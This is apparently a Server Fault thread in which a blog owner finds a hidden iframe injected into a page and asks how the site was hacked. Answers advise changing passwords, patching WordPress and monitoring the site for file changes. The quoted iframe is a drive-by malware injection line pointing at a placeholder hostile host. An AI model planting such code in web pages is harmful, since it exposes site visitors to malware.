1

Possible Duplicate:
My server's been hacked EMERGENCY

I got this weird page, which I am very sure was not created by me:

<iframe src="http://a.bad.site:8080/ts/in.cgi?pepsi106" width=125 height=125 style="visibility: hidden"></iframe>

Where the hell does it come from? Is this a virus??

My blog site, blog.domain.com was fine few weeks back. But now, all of sudden, when I go visit my blog, its become blank page and display:

This is index.html

Anyone has any idea how to removed it forever, and prevent it occur on my site again?

Community
  • 1

5 Answers5

3

I've seen that sort of iframe embedded before. Someone has definately hijacked your page and embedded the link. Remove all references to it that you can find, and change ALL your passwords.

Cheapo hosts never like to admit they've been hacked, so I wouldn't expect much help from them

Mark Henderson
  • 68,316
  • 31
  • 175
  • 255
2

It's a cross-site Scripting (XSS) attack. Start reading up on them. There are some great screencasts/videos around about this sort of thing too.

The main point is not to be negligent now. Your site has a weakness, which must be found and fixed. Don't blame it on your hosting company either; most likely, it's your own mistake for choosing a bad blog engine, or not keeping a good blog engine up to date with the latest security patches or releases.

Also: you seem to only be aware of "viruses". Cracking a server is nothing to do with viruses. The issue is a vulnerability. Old versions of wordpress do have them --- recently a very bad one, which you should definitely upgrade to patch. You might want to look into automatic security updates for your OS, programs which will email you a list of current vulnerabilities in your servers, and/or subscribe to CVE sites that warn you of all the latest software problems.

At the very least, if you're admining a linux server/site, subscribe to some linux admin sites, which post decent articles that teach you new skills and warn of new issues. XSS has been around a long time now.

Lee B
  • 3,380
  • 1
  • 17
  • 15
  • I dunno about it exclusively being an XSS. I had a website which was just a single static HTML file and a placeholder image, and it got one of these. And it was the hosts fault because every site I could find on their services had one. – Mark Henderson Oct 08 '09 at 20:19
  • Farseeker: Could be the case on some very insecure shared hosting, but any good (virtual) dedicated hosting shouldn't suffer from that sort of insecurity -- only the admin's (i.e. your) own oversights. I HAVE heard of some cheap website hosting companies deliberately putting ads into their clients' sites as a method of making the service pay though. I thought companies doing that had long since been avoided by everyone though, and had died as a result. – Lee B Oct 13 '09 at 21:36
1

In addition to Farseeker's suggestions, follow all of the instructions in this:

Virus Alert community service announcement


For the audio impaired, here is a text version of the message.

Nick Kavadias
  • 10,758
  • 7
  • 36
  • 47
0

Remove the "index.html" file from your directory index. It may be that your host switched the index precedence...from index.php (for example) first to index.html.

Xorlev
  • 1,845
  • 14
  • 12
  • Ok. I removed the index.html. It seems fine now. But, where does that weird file come from? It looks like virus. I called my hosting company, they said they didnt change the precedence. Weird!! I dont want it to happern again!! But HOW?? –  Oct 08 '09 at 08:01
  • Change your passwords to something secure. If you're still getting issues, then your host needs to fix it. Seeing your edit above, definitely not a friendly file. I would also make sure your blog software is updated to the newest security release. – Xorlev Oct 08 '09 at 08:05
  • I am using wordpress 2.7,, the latest should be 2.8 or something. So frustrating.. I have scanned my computer, no viruses detected. –  Oct 08 '09 at 08:11
  • Not your computer necessarily, but an exploit in the blogging software or something else. – Xorlev Oct 08 '09 at 08:32
  • There is a big exploit in all versions of wordpress below 2.8.4 (I think) that is very easy to exploit. You should upgrade to 2.8.4 ASAP. – mrdenny Oct 08 '09 at 18:44
0

As others have already sufficiently covered what to do about your little problem, the most important point of course being to do some learning, I won't duplicate their efforts. I will however add that you need to monitor your site. Clearly the hack could have taken place any time over a number of weeks, yet you were unaware of it.

There are many ways to automatically monitor a site for changes and you will need to choose a method that will work with your host's system. In case you're stuck for ideas, the method I employ is a shell script running on a local machine to do the following each night:

  • Mirror the entire site using wget (rsync is not available to me)
  • Call a Perl script which parses the log, ignoring selected items such as cache directories and files, building a list of any changes. If any changes are detected that list is emailed to me.
  • Call another script which recursively parses the .listing files and removes any local files and directories which no longer exist on the server.
  • Rename older archives of the site such that the previous 9 are kept and archive the current version.
John Gardeniers
  • 27,262
  • 12
  • 53
  • 108